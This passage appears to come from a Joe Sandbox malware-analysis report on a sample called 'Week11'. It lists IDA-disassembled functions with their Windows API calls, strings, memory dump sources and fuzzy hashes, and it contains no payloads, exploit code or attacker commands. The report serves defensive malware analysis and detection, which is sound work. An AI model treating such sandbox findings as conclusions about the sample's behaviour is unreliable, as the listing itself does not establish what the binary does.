                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$AllocFontMemoryPrivate
                                • String ID: .ttf$IDI_ICON_FONT$T9N$_EXT.ttf$common$default$theme_attrib
                                • API String ID: 1909619073-1496135245
                                • Opcode ID: dc20e6d1cb3d2915656a07cb2ff724f24a9c5b6b6e90b6d05837ea874cd156d6
                                • Instruction ID: 2ff41819fe04ce0788ad32e2a70418eca4de3f8adaeef7079eae5f51084d470c
                                • Opcode Fuzzy Hash: dc20e6d1cb3d2915656a07cb2ff724f24a9c5b6b6e90b6d05837ea874cd156d6
                                • Instruction Fuzzy Hash: 1EE14371E00204DFCB04DFA9E881A9EB7B4EF44314F54826EE915AB391CB38AD45CB99
                                Function 0047EAB0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 236COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,004B09B8,000000FF,00000000,0047B736,?), ref: 0047EB07
                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,004B09B8,000000FF,00000000,0047B736,?), ref: 0047EB0E
                                • GetTokenInformation.ADVAPI32(?), ref: 0047EB81
                                • GetLastError.KERNEL32 ref: 0047EB87
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004B09B8,000000FF,00000000,0047B736,?), ref: 0047EBB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
                                • String ID: T9N
                                • API String ID: 2078281146-185908819
                                • Opcode ID: 11a4bc241aaeac857d7296d65073594a5bf2b67527f86d9c47c556f244f4f811
                                • Instruction ID: a7f82cc93c5bb8a685682d5b3753467e8f8e4996987ecc2c1e7f637546b255b2
                                • Opcode Fuzzy Hash: 11a4bc241aaeac857d7296d65073594a5bf2b67527f86d9c47c556f244f4f811
                                • Instruction Fuzzy Hash: 2481BF766047018FC310DF29D881A5AB7E8FB89324F144B2EF959973D0DB39E905CB9A
                                Function 00448790 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 223synchronizationfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetTickCount.KERNEL32 ref: 004487F9
                                  • Part of subcall function 0048DE2F: __getptd.LIBCMT ref: 0048DE34
                                • _memset.LIBCMT ref: 0044881B
                                • _wcsncpy.LIBCMT ref: 00448830
                                • PathRemoveFileSpecW.SHLWAPI(?), ref: 0044883F
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 00448872
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 0044888B
                                • _rand.LIBCMT ref: 004488BE
                                • MoveFileW.KERNEL32(?,?), ref: 00448932
                                • GetLastError.KERNEL32 ref: 0044893C
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: FileObjectSingleWait$CountErrorLastMovePathRemoveSpecTick__getptd_memset_rand_wcsncpy
                                • String ID: %s\%d$T9N
                                • API String ID: 1256354863-135519442
                                • Opcode ID: 7bdaf92e14242d6473d0d61d22f2a9b02c7b65391cf784a57d49b28f2730a22b
                                • Instruction ID: 00aa38c6076ddc401274eeeea048ddfd2baf4b4b3fab62e7f4c05b26532d5765
                                • Opcode Fuzzy Hash: 7bdaf92e14242d6473d0d61d22f2a9b02c7b65391cf784a57d49b28f2730a22b
                                • Instruction Fuzzy Hash: 9A8190B1A006059FD710DF68CC85AAEB3B5FF49324F2487AEE019DB2A1DB349E45CB54
                                Function 004A883F Relevance: 18.1, APIs: 12, Instructions: 139COMMON
                                Download Yara Rule
                                APIs
                                • ____lc_handle_func.LIBCMT ref: 004A8873
                                • ____lc_codepage_func.LIBCMT ref: 004A887B
                                • __GetLocaleForCP.LIBCPMT ref: 004A88A4
                                • ____mb_cur_max_l_func.LIBCMT ref: 004A88BA
                                • MultiByteToWideChar.KERNEL32(00000001,00000009,?,00000002,?,00000000,?,?,?,?,0044C2DA,?), ref: 004A88D9
                                • ____mb_cur_max_l_func.LIBCMT ref: 004A88E7
                                • ___pctype_func.LIBCMT ref: 004A890C
                                • ____mb_cur_max_l_func.LIBCMT ref: 004A8932
                                • ____mb_cur_max_l_func.LIBCMT ref: 004A894A
                                • ____mb_cur_max_l_func.LIBCMT ref: 004A8962
                                • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,?,00000000,?,?,?,?,0044C2DA,?), ref: 004A896F
                                • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000001,?,00000000,?,?,?,?,0044C2DA,?), ref: 004A89A0
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ____mb_cur_max_l_func$ByteCharMultiWide$Locale____lc_codepage_func____lc_handle_func___pctype_func
                                • String ID:
                                • API String ID: 3819326198-0
                                • Opcode ID: 73e849e4132e983badf23de25d457494f94d89d203377f43e4ad4c91586d2649
                                • Instruction ID: be4efcea82c7acbbaf84cbdbf0495d91bd9ba5531dcccb3550ff59639d1780ae
                                • Opcode Fuzzy Hash: 73e849e4132e983badf23de25d457494f94d89d203377f43e4ad4c91586d2649
                                • Instruction Fuzzy Hash: 8841B471104246AEDB206F319C41B7B7BA9EF23351F24842FF8559A292DF3CC950DB59
                                Function 0047AAD0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 154libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 0047AB3D
                                • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 0047AB4F
                                • LoadLibraryW.KERNEL32(?), ref: 0047ABEE
                                • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 0047ABFA
                                • LoadLibraryW.KERNEL32(?), ref: 0047AC5F
                                • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 0047AC6B
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc$FolderPath_memset
                                • String ID: SetProcessDPIAware$SetProcessDpiAwareness$\Shcore.dll$\User32.dll
                                • API String ID: 1748625455-566016977
                                • Opcode ID: ff80ceac9f7b7110f44a33b3d835053ff2845b88fa8e460a05131bb4fc92fd49
                                • Instruction ID: 93c2aa1886c6c8e1d4854a4f4d751b754c41071df73770d687a8d629c2286f7f
                                • Opcode Fuzzy Hash: ff80ceac9f7b7110f44a33b3d835053ff2845b88fa8e460a05131bb4fc92fd49
                                • Instruction Fuzzy Hash: 3A51AFB1508341AFD721EB64D845B9FB7E8AFC5704F44882EF98983241D679E818CB5B
                                Function 00424890 Relevance: 16.7, APIs: 11, Instructions: 221COMMON
                                Download Yara Rule
                                APIs
                                • GdipResetPath.GDIPLUS(?), ref: 004248BA
                                • GdipAddPathArcI.GDIPLUS(?,?,?,?,?), ref: 00424903
                                • GdipAddPathLineI.GDIPLUS(?,?,?,?,?,?,?,?,?,?), ref: 0042492F
                                • GdipAddPathLineI.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00424956
                                • GdipAddPathLineI.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042497F
                                • GdipAddPathArcI.GDIPLUS(?,?,?,?,?,?,?), ref: 004249B4
                                • GdipClosePathFigure.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00424A7B
                                  • Part of subcall function 004246F0: GdipResetPath.GDIPLUS(?), ref: 0042471A
                                  • Part of subcall function 004246F0: GdipAddPathArcI.GDIPLUS(?,?,?), ref: 00424751
                                  • Part of subcall function 004246F0: GdipAddPathArcI.GDIPLUS(?,?,?), ref: 0042478D
                                  • Part of subcall function 004246F0: GdipAddPathArcI.GDIPLUS(?,?,?), ref: 004247CB
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: GdipPath$Line$Reset$CloseFigure
                                • String ID:
                                • API String ID: 2660712481-0
                                • Opcode ID: 05a307259dadda739b757ace0e9b44f7e1851ef57646c1e8489a39c200f161cb
                                • Instruction ID: 4a0c66622b68247810a171de605a71d5ab15b8fb2d0daafe8118e75e1a8016ed
                                • Opcode Fuzzy Hash: 05a307259dadda739b757ace0e9b44f7e1851ef57646c1e8489a39c200f161cb
                                • Instruction Fuzzy Hash: 5971ECB4700600AFDB14DF6DD985E6BBBE9EF89310718C66DA899CB348D634E800CB65
                                Function 0042E2E0 Relevance: 16.7, APIs: 11, Instructions: 166COMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 0042E36A
                                • VariantCopy.OLEAUT32(?,00000000), ref: 0042E375
                                • VariantClear.OLEAUT32(?), ref: 0042E3AD
                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0042E3CD
                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0042E3E6
                                • VariantInit.OLEAUT32(?), ref: 0042E40C
                                • VariantCopy.OLEAUT32(?,?), ref: 0042E41A
                                • VariantClear.OLEAUT32(?), ref: 0042E455
                                • VariantClear.OLEAUT32(?), ref: 0042E45B
                                • SafeArrayUnlock.OLEAUT32(?), ref: 0042E461
                                • SafeArrayDestroy.OLEAUT32(?), ref: 0042E46C
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Variant$ArraySafe$Clear$BoundCopyInit$DestroyUnlock
                                • String ID:
                                • API String ID: 3902834209-0
                                • Opcode ID: 120b392e3baa1723652337ca06f25e8983af417b8f8f3787e895c8f0b97185c3
                                • Instruction ID: bebac5beb3fe3608b87375f8885f3c8730b30ba1670c7eaca6d4d1e9a533f49e
                                • Opcode Fuzzy Hash: 120b392e3baa1723652337ca06f25e8983af417b8f8f3787e895c8f0b97185c3
                                • Instruction Fuzzy Hash: A451C571A00109EFDB00EFA5DC84ADE77B9EF59314F50862DFA15A7240DB399D05CBA4
                                Function 00436660 Relevance: 16.6, APIs: 11, Instructions: 93windowCOMMON
                                Download Yara Rule
                                APIs
                                • IsWindow.USER32(?), ref: 00436671
                                • CreateCompatibleDC.GDI32(00000000), ref: 00436693
                                • SelectObject.GDI32(00000000), ref: 004366A5
                                • GetWindowRect.USER32(?,?), ref: 004366B9
                                • OffsetRect.USER32(?,0000000A,0000000A), ref: 004366D8
                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004366EF
                                • GetClientRect.USER32(?,?), ref: 00436705
                                  • Part of subcall function 00433A00: CreateCompatibleDC.GDI32(?), ref: 00433A32
                                  • Part of subcall function 00433A00: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00433A4C
                                  • Part of subcall function 00433A00: SelectObject.GDI32(?,00000000), ref: 00433A59
                                  • Part of subcall function 00433A00: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00433A73
                                • SendMessageW.USER32(?,000007E9,?,00000000), ref: 00436727
                                  • Part of subcall function 00433990: BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 004339B2
                                  • Part of subcall function 00433990: SelectObject.GDI32(?,?), ref: 004339BF
                                  • Part of subcall function 00433990: DeleteObject.GDI32(?), ref: 004339CD
                                  • Part of subcall function 00433990: DeleteDC.GDI32(?), ref: 004339EB
                                • SetViewportOrgEx.GDI32(00000000,00000000,?,00000000), ref: 0043673D
                                • SelectObject.GDI32(00000000,?), ref: 00436748
                                • DeleteDC.GDI32(00000000), ref: 0043674F
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Object$Select$CompatibleCreateDeleteRectViewport$Window$BitmapClientMessageOffsetSend
                                • String ID:
                                • API String ID: 1637868518-0
                                • Opcode ID: b4c83d55ae25c4934dcf3f9786f0eca457369af6644b2bbaeefde86fccae5f76
                                • Instruction ID: c0df4666e800a506221e1a8d3eae2ba9367c003eafe8dd864a5ab916edfae826
                                • Opcode Fuzzy Hash: b4c83d55ae25c4934dcf3f9786f0eca457369af6644b2bbaeefde86fccae5f76
                                • Instruction Fuzzy Hash: 4D314F75A00219BFDB04DFA4CC89BAEB7BDFF48345F01456AE901A3240DB78A905CBA4
                                Function 004368A0 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 311windowCOMMON
                                Download Yara Rule
                                APIs
                                • __wcsicoll.LIBCMT ref: 00436905
                                • PathRemoveFileSpecW.SHLWAPI(00000000,?), ref: 00436A8B
                                • SysFreeString.OLEAUT32(00000000), ref: 00436AC4
                                • __wcsicoll.LIBCMT ref: 00436ACF
                                • PostMessageW.USER32(00000000,00000785,00000000,00000000), ref: 00436B86
                                • InvalidateRect.USER32(00000000,00000000,00000001), ref: 00436BA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: __wcsicoll$FileFreeInvalidateMessagePathPostRectRemoveSpecString
                                • String ID: T9N$T9N$default
                                • API String ID: 4187723721-3275040786
                                • Opcode ID: 8436fa98b3193ff5b67a1e9da3e9af34a053b27d83a9295353b7adfb58399884
                                • Instruction ID: 750b6764a4a3082850caea60a13f92b1413eeb066e140d5be2e2192c1a065c92
                                • Opcode Fuzzy Hash: 8436fa98b3193ff5b67a1e9da3e9af34a053b27d83a9295353b7adfb58399884
                                • Instruction Fuzzy Hash: 98C1D571A00216EFDB10EFA4D881B9EB7B5EF48314F15852AE901BB341DB38ED45CB99
                                Function 004288D0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 228COMMON
                                Download Yara Rule
                                APIs
                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,?), ref: 004289A3
                                • GetDC.USER32(00000000), ref: 004289F7
                                • DeleteDC.GDI32(00000000), ref: 00428A11
                                • GdipDeleteGraphics.GDIPLUS(00000000,?,00000000,?,00000000,00000000,?,?,004BEF78,?,?,004C0B64,?,?,004BEF78,?), ref: 00428A66
                                • GdipFree.GDIPLUS(00000000,00000000,?,00000000,?,00000000,00000000,?,?,004BEF78,?,?,004C0B64,?,?,004BEF78), ref: 00428A6C
                                • CopyRect.USER32(?,?), ref: 00428A96
                                • GdipDeleteFont.GDIPLUS(?), ref: 00428B11
                                • DeleteObject.GDI32(?), ref: 00428B1A
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Delete$Gdip$Font$CopyCreateFreeGraphicsObjectRect
                                • String ID: xK
                                • API String ID: 2892951979-4294704317
                                • Opcode ID: 6943fff1b2c66cf5b1f2976df4707ceacc02259f7faa94841cd67901f94dc53e
                                • Instruction ID: a09d9e1b0f579dff6a6a4d2c20492bf7a8fa672800bd25821b3eff6780f1c434
                                • Opcode Fuzzy Hash: 6943fff1b2c66cf5b1f2976df4707ceacc02259f7faa94841cd67901f94dc53e
                                • Instruction Fuzzy Hash: 0E818F71A01219EFCB14DFA8DC85BAEB7B5FF88310F14425EE914AB381DB74A901CB94
                                Function 0046CB60 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 184windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0048C58E: __EH_prolog3_catch.LIBCMT ref: 0048C595
                                • _memset.LIBCMT ref: 0046CC31
                                • SHGetFileInfoW.SHELL32(00000001,00000000,00000000,000002B4,00004201), ref: 0046CC89
                                • GetFileAttributesW.KERNEL32(00000001), ref: 0046CC94
                                • PathFindFileNameW.SHLWAPI(00000001,00000104), ref: 0046CCA9
                                • PathFindFileNameW.SHLWAPI(00000001,00000104), ref: 0046CCE5
                                • _wcsncpy.LIBCMT ref: 0046CCF3
                                • _memset.LIBCMT ref: 0046CD06
                                • SendMessageW.USER32(00000001,00001132,00000000,?), ref: 0046CD83
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: File$FindNamePath_memset$AttributesH_prolog3_catchInfoMessageSend_wcsncpy
                                • String ID: T9N
                                • API String ID: 1535625341-185908819
                                • Opcode ID: fd29f416889ab47bdbc6de329f7341301d448421d607c2efd513d8c2454fc69e
                                • Instruction ID: a26f68f0c228358448eb588c593fc2e1dd00396ae366987f90757a6f445471ac
                                • Opcode Fuzzy Hash: fd29f416889ab47bdbc6de329f7341301d448421d607c2efd513d8c2454fc69e
                                • Instruction Fuzzy Hash: CB61B4719012159BDB20DF19CC89BAEB7B8AB04304F0441EBE94DA7381E7795E84CB9A
                                Function 0044C530 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 84COMMON
                                Download Yara Rule
                                APIs
                                • __CxxThrowException@8.LIBCMT ref: 0044C562
                                  • Part of subcall function 0048F048: RaiseException.KERNEL32(?,00000000,P0@,?,?,?,?,?,00403050,?,004CD820,?), ref: 0048F08A
                                • __CxxThrowException@8.LIBCMT ref: 0044C5B6
                                • __CxxThrowException@8.LIBCMT ref: 0044C5F0
                                • __CxxThrowException@8.LIBCMT ref: 0044C62C
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Exception@8Throw$ExceptionRaise
                                • String ID: ,&L$,&L$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 3476068407-3985702304
                                • Opcode ID: 06a9a59fa7cfdbaf5b0e390a7c151bb8516534a1ec13b8d384039371debb77b1
                                • Instruction ID: 83645f0a85907b076d934c5000bad3ad7476bc0fccc7c38b0cd5477933f1cb83
                                • Opcode Fuzzy Hash: 06a9a59fa7cfdbaf5b0e390a7c151bb8516534a1ec13b8d384039371debb77b1
                                • Instruction Fuzzy Hash: B52144B1D00208AAEB55EBE5C946FDDB7B8AF09708F20851EE12576192D7FC560CCB68
                                Function 0044E0D0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(?,?), ref: 0044E0EA
